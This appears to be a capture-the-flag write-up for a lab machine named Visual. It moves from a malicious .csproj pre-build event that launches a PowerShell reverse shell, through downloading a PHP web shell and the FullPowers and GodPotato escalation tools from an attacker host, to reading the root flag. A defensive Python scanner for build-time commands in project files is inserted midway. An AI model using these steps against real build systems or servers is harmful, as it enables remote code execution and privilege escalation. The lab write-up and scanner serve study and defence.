80
echo '[ip] visual.htb' >> /etc/hosts
Only port 80 is open.
Test the local .git URL with netcat.
Found the .csproj pre-build event feature on Google.
Setting up Gitea takes time, so I'm going to use Python's HTTP server to share the git repo.
".csproj" prebuild file
Find a ps1 reverse shell on Google and save it as shell.ps1.
shell.ps1
git init
git add .
git commit -m 'project_name'
cd .git
git --bare update-server-info
python3 -m http.server
Then start listening on port 6666 to receive the reverse shell.
got the initial access
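The initial access above relies on a .csproj that runs a command at build time (a pre-build event). Anyone operating a build pipeline that compiles user-submitted projects wants to catch that before the build runs. The following scanner is an added example and is not part of the original writeup; it parses a project file with the standard library and reports every build-time command it finds (PreBuildEvent/PostBuildEvent properties, Exec tasks in any Target, and Import elements that pull in external .targets files). The embedded SAMPLE_CSPROJ is constructed for this example.

```python
import xml.etree.ElementTree as ET

# Constructed sample .csproj for this example: a PreBuildEvent property plus an
# Exec task inside a BeforeBuild target. Both run a shell command when the
# project is built, which is exactly what a build server must not do blindly.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>powershell -File shell.ps1</PreBuildEvent>
  </PropertyGroup>
  <Target Name="BeforeBuild">
    <Exec Command="cmd /c whoami" />
  </Target>
</Project>
"""

# Constructed clean project with no build-time commands, for comparison.
CLEAN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
</Project>
"""

# MSBuild properties whose text is executed as a shell command around the build.
BUILD_EVENT_PROPERTIES = {"PreBuildEvent", "PostBuildEvent"}
# MSBuild tasks that execute an arbitrary command line.
COMMAND_TASKS = {"Exec"}


def _local(tag):
    """Strip the XML namespace prefix from a tag ('{ns}Exec' -> 'Exec')."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(csproj_text):
    """Return a list of (kind, value) for every build-time command or external
    import found in the project XML, in document order."""
    root = ET.fromstring(csproj_text)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in BUILD_EVENT_PROPERTIES and elem.text and elem.text.strip():
            findings.append((name, elem.text.strip()))
        elif name in COMMAND_TASKS:
            cmd = (elem.get("Command") or "").strip()
            if cmd:
                findings.append((name, cmd))
        elif name == "Import":
            # Imported .targets/.props files can carry their own Exec tasks,
            # so they are reported for manual review rather than executed.
            proj = (elem.get("Project") or "").strip()
            if proj:
                findings.append(("Import", proj))
    return findings


def is_safe_to_build(csproj_text):
    """True only when the project file contains no build-time commands or imports."""
    return not find_build_commands(csproj_text)


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_CSPROJ), ("clean", CLEAN_CSPROJ)):
        print(f"{label}: safe={is_safe_to_build(text)}")
        for kind, value in find_build_commands(text):
            print(f"  {kind}: {value}")
```

A build service would run `is_safe_to_build` on every submitted project file (and on any .targets or .props the Import elements point at) and refuse to invoke msbuild until a human has reviewed the reported commands; rejecting on any finding is the simplest policy, since legitimate projects rarely need a pre-build shell command.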
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Upload a reverse shell to an accessible path to switch to the local service account.
curl http://10.10.16.12:8000/shell.php -o C:\xampp\htdocs\uploads\shell.php
git clone https://github.com/itm4n/FullPowers.git
curl http://10.10.16.12:8000/FullPowers.exe -o fp.exe
fp.exe
whoami /priv
curl http://10.10.16.12:8000/GodPotato-NET4.exe -o C:\xampp\htdocs\uploads\God.exe
God.exe -cmd "cmd /c whoami"
God.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt"
get the root flag!